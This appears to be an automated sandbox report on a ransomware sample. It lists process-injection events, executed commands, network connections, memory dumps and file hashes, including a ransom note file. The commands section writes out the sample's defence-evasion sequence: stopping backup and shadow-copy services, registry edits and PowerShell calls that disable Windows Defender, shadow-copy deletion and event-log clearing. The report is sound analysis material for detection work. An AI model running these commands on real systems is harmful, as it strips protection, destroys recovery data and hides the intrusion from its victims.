PID 1436 wrote to memory of 2184 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 432 wrote to memory of 3972 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 3972 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 3972 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 3972 wrote to memory of 912 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3972 wrote to memory of 912 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3972 wrote to memory of 912 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 432 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 4080 wrote to memory of 1656 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4080 wrote to memory of 1656 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4080 wrote to memory of 1656 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 432 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 3912 wrote to memory of 2848 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3912 wrote to memory of 2848 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3912 wrote to memory of 2848 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 432 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 3396 wrote to memory of 3872 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3396 wrote to memory of 3872 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3396 wrote to memory of 3872 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 432 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 608 wrote to memory of 620 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 608 wrote to memory of 620 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 608 wrote to memory of 620 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 432 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\sc.exe
PID 432 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\sc.exe
PID 432 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\sc.exe
PID 432 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\sc.exe
PID 432 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\sc.exe
PID 432 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\sc.exe
PID 432 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\sc.exe
PID 432 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\sc.exe
PID 432 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\sc.exe
PID 432 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe

"C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"

C:\Windows\SysWOW64\net.exe

net.exe stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "vmicvss" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "VSS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "WebClient" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UnistoreSvc_12b50" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_12b50" /y

C:\Windows\SysWOW64\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UnistoreSvc_12b50" start= disabled

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl application

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\auw1_HOW_TO_DECRYPT.txt

Network

Country Destination Domain Proto
IE 52.109.76.30:443 tcp
US 8.8.8.8:53 time.windows.com udp
NL 40.119.148.38:123 time.windows.com udp

Files

memory/1304-115-0x0000000000000000-mapping.dmp

memory/2800-116-0x0000000000000000-mapping.dmp

memory/3476-117-0x0000000000000000-mapping.dmp

memory/2308-118-0x0000000000000000-mapping.dmp

memory/3940-119-0x0000000000000000-mapping.dmp

memory/2660-120-0x0000000000000000-mapping.dmp

memory/1436-121-0x0000000000000000-mapping.dmp

memory/2184-122-0x0000000000000000-mapping.dmp

memory/3972-123-0x0000000000000000-mapping.dmp

memory/912-124-0x0000000000000000-mapping.dmp

memory/4080-125-0x0000000000000000-mapping.dmp

memory/1656-126-0x0000000000000000-mapping.dmp

memory/3912-127-0x0000000000000000-mapping.dmp

memory/2848-128-0x0000000000000000-mapping.dmp

memory/3396-129-0x0000000000000000-mapping.dmp

memory/3872-130-0x0000000000000000-mapping.dmp

memory/608-131-0x0000000000000000-mapping.dmp

memory/620-132-0x0000000000000000-mapping.dmp

memory/884-133-0x0000000000000000-mapping.dmp

memory/3896-134-0x0000000000000000-mapping.dmp

memory/364-135-0x0000000000000000-mapping.dmp

memory/1264-136-0x0000000000000000-mapping.dmp

memory/1376-137-0x0000000000000000-mapping.dmp

memory/1780-138-0x0000000000000000-mapping.dmp

memory/3932-139-0x0000000000000000-mapping.dmp

memory/1904-140-0x0000000000000000-mapping.dmp

memory/2236-141-0x0000000000000000-mapping.dmp

memory/3108-142-0x0000000000000000-mapping.dmp

memory/3020-143-0x0000000000000000-mapping.dmp

memory/3128-144-0x0000000000000000-mapping.dmp

memory/3152-145-0x0000000000000000-mapping.dmp

memory/3952-146-0x0000000000000000-mapping.dmp

memory/3764-147-0x0000000000000000-mapping.dmp

memory/1956-148-0x0000000000000000-mapping.dmp

memory/2160-149-0x0000000000000000-mapping.dmp

memory/3884-150-0x0000000000000000-mapping.dmp

memory/2148-151-0x0000000000000000-mapping.dmp

memory/2768-152-0x0000000000000000-mapping.dmp

memory/1160-153-0x0000000000000000-mapping.dmp

memory/1184-154-0x0000000000000000-mapping.dmp

memory/2480-155-0x0000000000000000-mapping.dmp

memory/3312-156-0x0000000000000000-mapping.dmp

memory/3684-157-0x0000000000000000-mapping.dmp

memory/2676-158-0x0000000000000000-mapping.dmp

memory/1652-159-0x0000000000000000-mapping.dmp

memory/2836-160-0x0000000000000000-mapping.dmp

memory/368-161-0x0000000000000000-mapping.dmp

memory/404-162-0x0000000000000000-mapping.dmp

memory/1224-163-0x0000000000000000-mapping.dmp

memory/3936-164-0x0000000000000000-mapping.dmp

memory/2500-165-0x0000000000000000-mapping.dmp

memory/1348-166-0x0000000000000000-mapping.dmp

memory/2324-167-0x0000000000000000-mapping.dmp

memory/1836-168-0x0000000000000000-mapping.dmp

memory/4020-169-0x0000000000000000-mapping.dmp

memory/2392-170-0x0000000000000000-mapping.dmp

memory/2936-171-0x0000000000000000-mapping.dmp

memory/2380-172-0x0000000000000000-mapping.dmp

memory/3188-173-0x0000000000000000-mapping.dmp

memory/1420-174-0x0000000000000000-mapping.dmp

memory/2028-175-0x0000000000000000-mapping.dmp

memory/3736-176-0x0000000000000000-mapping.dmp

memory/3708-177-0x0000000000000000-mapping.dmp

memory/2724-178-0x0000000000000000-mapping.dmp

memory/1692-180-0x00000000006C0000-0x00000000006C1000-memory.dmp

memory/1692-179-0x00000000006C0000-0x00000000006C1000-memory.dmp

memory/1692-181-0x0000000000D80000-0x0000000000DB6000-memory.dmp

memory/1692-182-0x0000000006CD0000-0x00000000072F8000-memory.dmp

memory/1692-183-0x0000000000EA0000-0x0000000000EA1000-memory.dmp

memory/1692-184-0x0000000000EA2000-0x0000000000EA3000-memory.dmp

memory/1692-185-0x0000000006B10000-0x0000000006B32000-memory.dmp

memory/1692-186-0x0000000007300000-0x0000000007366000-memory.dmp

memory/1692-187-0x0000000007450000-0x00000000074B6000-memory.dmp

memory/1692-188-0x00000000074C0000-0x0000000007810000-memory.dmp

memory/1692-189-0x00000000073C0000-0x00000000073DC000-memory.dmp

memory/1692-190-0x00000000079D0000-0x0000000007A1B000-memory.dmp

memory/1692-191-0x0000000007CD0000-0x0000000007D46000-memory.dmp

memory/1692-192-0x00000000006C0000-0x00000000006C1000-memory.dmp

memory/1692-200-0x0000000006CD0000-0x00000000072F8000-memory.dmp

memory/1692-201-0x0000000008B50000-0x0000000008B83000-memory.dmp

memory/1692-202-0x0000000008B50000-0x0000000008B83000-memory.dmp

memory/1692-203-0x0000000006B10000-0x0000000006B32000-memory.dmp

memory/1692-204-0x0000000007300000-0x0000000007366000-memory.dmp

memory/1692-205-0x0000000007450000-0x00000000074B6000-memory.dmp

memory/1692-206-0x00000000079D0000-0x0000000007A1B000-memory.dmp

memory/1692-207-0x0000000007CD0000-0x0000000007D46000-memory.dmp

memory/1692-208-0x0000000008B30000-0x0000000008B4E000-memory.dmp

memory/1692-213-0x0000000008E90000-0x0000000008F35000-memory.dmp

memory/1692-214-0x000000007EAA0000-0x000000007EAA1000-memory.dmp

memory/1692-215-0x0000000009050000-0x00000000090E4000-memory.dmp

memory/1692-282-0x0000000000EA3000-0x0000000000EA4000-memory.dmp

memory/1692-409-0x0000000006820000-0x000000000683A000-memory.dmp

memory/1692-414-0x0000000006820000-0x000000000683A000-memory.dmp

memory/1692-415-0x0000000006810000-0x0000000006818000-memory.dmp

memory/1692-420-0x0000000006810000-0x0000000006818000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 1c19c16e21c97ed42d5beabc93391fc5
SHA1 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA256 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA512 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

memory/1112-433-0x00000000049F0000-0x0000000004A26000-memory.dmp

memory/1112-434-0x0000000007540000-0x0000000007B68000-memory.dmp

memory/1112-435-0x0000000006F00000-0x0000000006F01000-memory.dmp

memory/1112-436-0x0000000006F02000-0x0000000006F03000-memory.dmp

memory/1112-437-0x0000000007CA0000-0x0000000007CC2000-memory.dmp

memory/1112-438-0x0000000007D40000-0x0000000007DA6000-memory.dmp

memory/1112-439-0x0000000007E80000-0x0000000007EE6000-memory.dmp

memory/1112-440-0x0000000007EF0000-0x0000000008240000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2cc2243fb8463e6c72e4652243bce562
SHA1 b71f572793c02c99af2adcb386c7415068f78bcf
SHA256 9cbeb9589fb0fffe24c41bbc36ee25c307f0cc985c1493a17c6f1350735022ef
SHA512 64188eef082312488cc8a8b1e71a292b20009777a966cc4ac5d07975c88103df771fc40b27f6c319d4370bbbdb356a0abb1ca2d4e3095eee518ff545ffe040b9

memory/1112-442-0x0000000007E50000-0x0000000007E6C000-memory.dmp

memory/1112-443-0x00000000087A0000-0x00000000087EB000-memory.dmp

memory/1112-444-0x0000000008590000-0x0000000008606000-memory.dmp

memory/1112-453-0x0000000007540000-0x0000000007B68000-memory.dmp

memory/1112-454-0x0000000009680000-0x00000000096B3000-memory.dmp

memory/1112-455-0x0000000009680000-0x00000000096B3000-memory.dmp

memory/1112-456-0x000000007EE60000-0x000000007EE61000-memory.dmp

memory/1112-457-0x0000000007CA0000-0x0000000007CC2000-memory.dmp

memory/1112-458-0x0000000007D40000-0x0000000007DA6000-memory.dmp

memory/1112-459-0x0000000007E80000-0x0000000007EE6000-memory.dmp

memory/1112-460-0x00000000087A0000-0x00000000087EB000-memory.dmp

memory/1112-461-0x0000000008590000-0x0000000008606000-memory.dmp

memory/1112-462-0x0000000009640000-0x000000000965E000-memory.dmp

memory/1112-467-0x00000000096C0000-0x0000000009765000-memory.dmp

memory/1112-468-0x0000000009990000-0x0000000009A24000-memory.dmp

memory/1112-469-0x0000000006F03000-0x0000000006F04000-memory.dmp

memory/1112-662-0x0000000009920000-0x000000000993A000-memory.dmp

memory/1112-667-0x0000000009920000-0x000000000993A000-memory.dmp

memory/1112-668-0x0000000009910000-0x0000000009918000-memory.dmp

memory/1112-673-0x0000000009910000-0x0000000009918000-memory.dmp

C:\Users\Admin\Desktop\auw1_HOW_TO_DECRYPT.txt

MD5 2820fcb11d7daa8ec77b1f331a1352b6
SHA1 16cc7a5cef90c634e5b7440cd1c16933b18bcec7
SHA256 7de74dbb2e345a415ea93c7f700cff4c97b0a2dbe65234593d96269148acbdf5
SHA512 3cd9504b4e29bdcaf36879eb3e1067827c70786e2d4c47f0be202d1791847533f5cfff5b3ce3a5817566575f07498de0af77c4bf84a2d7acb0705aa411278fc1